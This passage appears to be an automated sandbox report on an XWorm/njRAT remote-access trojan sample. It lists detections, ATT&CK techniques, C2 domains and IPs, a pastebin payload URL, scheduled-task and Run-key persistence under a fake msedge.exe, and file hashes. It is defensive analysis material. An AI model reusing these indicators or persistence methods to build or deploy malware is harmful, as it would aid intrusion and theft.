Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 18.2.msedge.exe.1520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.msedge.exe.1520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.msedge.exe.309c4c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.msedge.exe.309c4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2551372869.0000000001520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2552140840.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 8072, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 18.2.msedge.exe.1520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.msedge.exe.1520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.msedge.exe.309c4c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.msedge.exe.309c4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2551372869.0000000001520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2552140840.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 8072, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	111 Scheduled Task/Job	111 Scheduled Task/Job	11 Process Injection	13 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 Registry Run Keys / Startup Folder	111 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	11 System Information Discovery	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	82%	ReversingLabs	ByteCode-MSIL.Backdoor.njRAT
file.exe	100%	Avira	HEUR/AGEN.1305763
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	100%	Avira	HEUR/AGEN.1305763
C:\Program Files\msedge.exe	100%	Avira	HEUR/AGEN.1305763
C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	100%	Joe Sandbox ML
C:\Program Files\msedge.exe	100%	Joe Sandbox ML
C:\Program Files\msedge.exe	82%	ReversingLabs	ByteCode-MSIL.Backdoor.njRAT
C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	82%	ReversingLabs	ByteCode-MSIL.Backdoor.njRAT

Source	Detection	Scanner	Label	Link
http://crl.m~	0%	Avira URL Cloud	safe
https://.509.1.1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
flash-mathematical.gl.at.ply.gg	147.185.221.24	true	true		unknown
pastebin.com	172.67.19.24	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/BE5x0K3q	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 0000000A.00000002.1350861462.000002989AE94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1476995740.000001D823A04000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000E.00000002.1400754417.000001D813BB8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000A.00000002.1319587640.000002988B049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1400754417.000001D813BB8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000E.00000002.1400754417.000001D813BB8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://.509.1.1	powershell.exe, 0000000E.00000002.1502352208.000001D82C0B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000A.00000002.1319587640.000002988B049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1400754417.000001D813BB8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000E.00000002.1476995740.000001D823A04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000A.00000002.1350861462.000002989AE94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1476995740.000001D823A04000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 0000000E.00000002.1503638079.000001D82C19D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000E.00000002.1476995740.000001D823A04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000E.00000002.1476995740.000001D823A04000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.m~	powershell.exe, 0000000A.00000002.1357401180.00000298A3520000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 0000000A.00000002.1319587640.000002988AE21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1400754417.000001D813991000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	file.exe, 00000005.00000002.1563163174.0000000002771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1319587640.000002988AE21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1400754417.000001D813991000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000012.00000002.2552140840.0000000003091000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.v	msedge.exe, 00000012.00000002.2571506623.000000001BA81000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pastebin.com	msedge.exe, 00000012.00000002.2552140840.0000000003091000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000E.00000002.1400754417.000001D813BB8000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.19.24	pastebin.com	United States		13335	CLOUDFLARENETUS	false
147.185.221.24	flash-mathematical.gl.at.ply.gg	United States		12087	SALSGIVERUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574873
Start date and time:	2024-12-13 17:56:52 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@16/14@2/2
EGA Information:	Successful, ratio: 11.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 118 Number of non-executed functions: 39
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, VSSVC.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200, 4.245.163.56
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Runtime Broken Core.exe, PID 1624 because it is empty
Execution Graph export aborted for target Runtime Broken Core.exe, PID 1648 because it is empty
Execution Graph export aborted for target Runtime Broken Core.exe, PID 7196 because it is empty
Execution Graph export aborted for target Runtime Broken Core.exe, PID 7496 because it is empty
Execution Graph export aborted for target file.exe, PID 2432 because it is empty
Execution Graph export aborted for target msedge.exe, PID 8020 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7388 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7676 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
11:57:50	API Interceptor	34x Sleep call for process: powershell.exe modified
13:18:16	API Interceptor	1640497x Sleep call for process: msedge.exe modified
19:18:07	Task Scheduler	Run new task: msedge path: C:\Program Files\msedge.exe
19:18:15	Task Scheduler	Run new task: Runtime Broken Core path: C:\Users\user\AppData\Roaming\Runtime s>Broken Core.exe
19:18:16	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Runtime Broken Core C:\Users\user\AppData\Roaming\Runtime Broken Core.exe
19:18:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Runtime Broken Core C:\Users\user\AppData\Roaming\Runtime Broken Core.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.19.24	rrats.exe	Get hash	malicious	AsyncRAT	Browse	pastebin.com/raw/KKpnJShN
	sys_upd.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_menu..ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm2.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_phshop..ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	VvPrGsGGWH.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	pastebin.com/raw/sA04Mwk2
	HQsitBLlOv.dll	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	xK44OOt7vD.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_hiddenz.ps1	Get hash	malicious	AsyncRAT, XWorm	Browse	pastebin.com/raw/sA04Mwk2
147.185.221.24	file.exe	Get hash	malicious	XWorm	Browse
	NhoqAfkhHL.bat	Get hash	malicious	Unknown	Browse
	a4lIk1Jrla.exe	Get hash	malicious	Njrat, RevengeRAT	Browse
	W6s1vzcRdj.exe	Get hash	malicious	XWorm	Browse
	u7e3vb5dfk.exe	Get hash	malicious	XWorm	Browse
	aOi4JyF92S.exe	Get hash	malicious	XWorm	Browse
	PG4w1WB9dE.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	a4BE6gJooT.exe	Get hash	malicious	XWorm	Browse
	grK0Oh8p4Z.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	SplpM1fFkV.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pastebin.com	main.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	CVmkXJ7e0a.exe	Get hash	malicious	SheetRat	Browse	104.20.4.235
	http://annavirgili.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	172.67.19.24
	http://annavirgili.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	172.67.19.24
	KrnlSetup.exe	Get hash	malicious	XWorm	Browse	104.20.3.235
	Revo.Uninstaller.Pro.v5.3.4.exe	Get hash	malicious	Unknown	Browse	104.20.3.235
	Revo.Uninstaller.Pro.v5.3.4.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	rrats.exe	Get hash	malicious	AsyncRAT	Browse	172.67.19.24
	Q8o0Mx52Fd.exe	Get hash	malicious	Unknown	Browse	104.20.3.235
	Q8o0Mx52Fd.exe	Get hash	malicious	Unknown	Browse	104.20.3.235

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	IFTM0g0NWX.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Download-Roblox-Solara.exe	Get hash	malicious	LummaC	Browse	104.21.50.161
	https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly95NE81LnN0YXJ5bm91c2UucnUvdDV2My8=	Get hash	malicious	Unknown	Browse	172.67.213.90
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	FW_ TBI Construction Company.eml	Get hash	malicious	Unknown	Browse	104.17.25.14
	Set-Up.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	MessengerAdmin.exe	Get hash	malicious	LummaC	Browse	104.21.16.1
	https://google.co.ve/url?6q=tlqq0rdJLi6z73yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fwdsoft.com.br%2f7yoya/ngr2j14j20ovor/ZGF2aWQucm90aGJ1cm5AcXVpbHRlcmNoZXZpb3QuY29t	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	RedBull [YouTube Partneships].exe	Get hash	malicious	LummaC	Browse	104.21.16.1
SALSGIVERUS	testingg.exe	Get hash	malicious	Njrat	Browse	147.185.221.19
	Bloxflip Predictor.exe	Get hash	malicious	Njrat	Browse	147.185.221.224
	system404.exe	Get hash	malicious	Metasploit	Browse	147.185.221.19
	Discord.exe	Get hash	malicious	AsyncRAT	Browse	147.185.221.18
	CVmkXJ7e0a.exe	Get hash	malicious	SheetRat	Browse	147.185.221.22
	file.exe	Get hash	malicious	XWorm	Browse	147.185.221.24
	NhoqAfkhHL.bat	Get hash	malicious	Unknown	Browse	147.185.221.24
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	147.160.103.28
	a4lIk1Jrla.exe	Get hash	malicious	Njrat, RevengeRAT	Browse	147.185.221.24
	W6s1vzcRdj.exe	Get hash	malicious	XWorm	Browse	147.185.221.24

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	svhost.vbs	Get hash	malicious	Unknown	Browse	172.67.19.24
	hvqc3lk7ly.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	172.67.19.24
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.19.24
	adv.ps1	Get hash	malicious	LummaC	Browse	172.67.19.24
	d2W4YpqsKg.lnk	Get hash	malicious	LummaC	Browse	172.67.19.24
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.19.24
	https://nam.dcv.ms/0CX72Iqyxf	Get hash	malicious	HTMLPhisher	Browse	172.67.19.24
	https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=	Get hash	malicious	HTMLPhisher	Browse	172.67.19.24
	pxGom77XRW.doc	Get hash	malicious	Unknown	Browse	172.67.19.24
	GSAT3WdrJ8.doc	Get hash	malicious	Unknown	Browse	172.67.19.24

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	360448
Entropy (8bit):	6.494192551510268
Encrypted:	false
SSDEEP:	3072:IuKB70VnOzZJ5ldNCNL2EHBAnpK37nXC8d009Q7I6Ps574tyJh+gKAZ6gUXnBppP:76J5f8/R6PeF6JgrGqStGEbxq
MD5:	0EA332E21336FF3E93E5713B6CF0A74F
SHA1:	307253C29CB74ADE88684F45B8FE10FC05BCF202
SHA-256:	3663D60F0C8125E46F3F4EFB108D21FEA6065F8C636E770D7EFB26E66C2529A9
SHA-512:	E734465CB281A4CBF2383E550D94B01E8459E24324977FD3C35A4D8D16BEAA2BCEE866639E55CF9828F6DE71588580DC796B8BF0DD92BB0DF6C54E22E80059CB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Program Files\msedge.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Pg.................~..........z.... ........@.. ....................................@.................................,...L.......H............................................................................................ ..H............text....\|... ...~.................. ..`.rsrc...H...........................@..@.reloc...............~..............@..B................H...........N.............................................................(.....r...p.. .l.....(.....r...p.. ......s.........s.........s.........s............0..........~....o.....8............0..........~....o.....8............0..........~....o.....8............0..........~....o.....8............r-..p.. ......rC..p.. S.....rY..p.. ..?...ro..p.. ......r...p.. E/...jr...p(....r...p(............(....*.0-.........(....:.....(....~....~....r...p~....(.....(.....@p..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Runtime Broken Core.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Runtime Broken Core.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1501
Entropy (8bit):	5.38139422375379
Encrypted:	false
SSDEEP:	24:ML9E4KQMsXE4NpyAE4KKUNKKDE4KGKZI6Kh6+84xp3/Vcll1qE4GIs0E4KD:MxHKQrHNpyAHKKkKYHKGSI6o6+vxp3/o
MD5:	BC44888FFCC5B8661E01D2962EA0C9DB
SHA1:	013F77696834D7AD899CFE6FB96EB9E81D353FBE
SHA-256:	B6D54547460AA7B94BA0AF2ECD1D4A02DAD44215896F890AD8B6C32E7AE9C60B
SHA-512:	6F37E1894943062D98615EDC75256700DF9AE0BF391FD4D83330693C4889957279B6F3FA678E3FA586481F7CB3CC1FA51913A18164F685980F2111B792E25D59
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1715
Entropy (8bit):	5.384194678523295
Encrypted:	false
SSDEEP:	48:MxHKQrHNpyAHKKkKYHKGSI6o6+vxp3/ell1qHGIs0HKabHhnjG:iqYtp9qKkKYqGSI6o9Zp/ellwmj0qabM
MD5:	2BDF4A4AADF041702366E35E1B034A75
SHA1:	2E4D17B3F3B755FB1832E21E45080046165EDC79
SHA-256:	3A0B24A169D5523003BE52C37E518E8A45FBBC17BE6B3F8E43892BEBB78FB9B0
SHA-512:	823EF568C729ED66C7F715A6FF02807869BFBC5CEF2E009F39947BCFE1384215716D6A9DF117CE63B9810127ED76198CF0AA513396772DB5DBECE15A1089A6FA
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

Download File

Process:	C:\Program Files\msedge.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1501
Entropy (8bit):	5.38139422375379
Encrypted:	false
SSDEEP:	24:ML9E4KQMsXE4NpyAE4KKUNKKDE4KGKZI6Kh6+84xp3/Vcll1qE4GIs0E4KD:MxHKQrHNpyAHKKkKYHKGSI6o6+vxp3/o
MD5:	BC44888FFCC5B8661E01D2962EA0C9DB
SHA1:	013F77696834D7AD899CFE6FB96EB9E81D353FBE
SHA-256:	B6D54547460AA7B94BA0AF2ECD1D4A02DAD44215896F890AD8B6C32E7AE9C60B
SHA-512:	6F37E1894943062D98615EDC75256700DF9AE0BF391FD4D83330693C4889957279B6F3FA678E3FA586481F7CB3CC1FA51913A18164F685980F2111B792E25D59
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41cymmgz.isb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d4rfz1jl.hpl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fskb4t0w.cck.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
